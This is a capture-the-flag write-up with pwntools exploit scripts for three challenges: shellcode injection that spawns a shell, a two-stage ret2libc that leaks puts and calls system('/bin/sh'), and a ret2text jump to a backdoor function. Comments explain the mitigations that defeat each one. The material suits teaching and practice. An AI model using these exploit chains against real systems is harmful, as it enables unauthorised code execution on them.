全是简单题目，直接上 exp。

NC

直接用 nc 连接，然后 ls 再 cat flag 即可。

shellcode

from pwn import*
# "shellcode" challenge: the entire payload is one assembled shell stub.
# Presumably the service copies its input into memory and jumps to it; the
# target binary is not shown on this page, so confirm before relying on that.
# Defender's view: this only works where input lands in memory that is both
# writable and executable. A non-executable stack/heap (NX, W^X) removes it.

# asm() and shellcraft take the instruction set from context, so it must be
# set before the stub is assembled.
context.arch = 'amd64'
conn = remote('gz.imxbt.cn', 20029)

# sendline() appends a newline after the assembled bytes.
conn.sendline(asm(shellcraft.sh()))

# Hand the socket over to the terminal.
conn.interactive()

ret2libc

from pwn import*
# ret2libc in two passes over the same stack overflow: pass 1 prints the
# runtime address of puts, pass 2 uses it to locate system and "/bin/sh".
# Defender's view: the chain depends on the saved return address being
# reachable by the overflow, on fixed code addresses in the binary (the
# 0x40.... constants below) and on a matching copy of libc. A stack protector
# and a position-independent build each remove one of those preconditions.
# The binary's build flags are not shown on this page; confirm with checksec.
target = ELF('./ezret2libc')
libc = ELF('./libc.so.6')
conn = remote('gz.imxbt.cn', 20030)

main_addr = target.sym['main']

# Hard-coded addresses inside the challenge binary.
# presumably a `pop rdi; ret` gadget (first-argument register) -- TODO confirm
rdi_gadget = 0x0401209
# presumably a bare `ret` -- TODO confirm
ret_gadget = 0x040101a

# presumably 0x70 bytes up to the saved rbp plus 8 for the saved rbp itself
padding = cyclic(0x70 + 8)

# Pass 1: call puts on its own GOT slot, then return into main so the
# vulnerable read runs a second time.
leak_chain = [rdi_gadget, target.got['puts'], target.plt['puts'], main_addr]
conn.sendline(padding + b''.join(p64(word) for word in leak_chain))

# Read up to the first 0x7f byte and keep the last six bytes: the top byte of
# a little-endian userland pointer on x86-64 Linux is usually 0x7f.
# NOTE(review): the delimiter here and '/bin/sh' below are str literals;
# bytes literals would be the explicit form on Python 3.
reply = conn.recvuntil('\x7f')
puts_addr = u64(reply[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

# Everything in libc sits at a constant offset from the leaked symbol.
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'))

# Pass 2: the extra leading `ret` is presumably there to keep the stack
# 16-byte aligned for system(); the page does not explain it.
call_chain = [ret_gadget, rdi_gadget, binsh_addr, system_addr, main_addr]
conn.sendline(padding + b''.join(p64(word) for word in call_chain))

conn.interactive()

ret2text

from pwn import*
# ret2text: overwrite the saved return address with the address of a function
# that already exists in the binary.
# Defender's view: this needs an unprotected return address and a fixed load
# address (the 0x40.... constants). A stack canary or a PIE build breaks it,
# and shipping the binary without the leftover "backdoor" routine removes the
# target altogether.

# presumably the address of the author's win/backdoor function -- TODO confirm
backdoor_addr = 0x401200
# presumably a bare `ret`, likely for stack alignment -- the page does not say
ret_gadget = 0x40101a

conn = remote('gz.imxbt.cn', 20033)

# presumably an 8-byte buffer plus 8 bytes of saved rbp before the return slot
filler = cyclic(0x8 + 8)
conn.sendline(filler + p64(ret_gadget) + p64(backdoor_addr))

conn.interactive()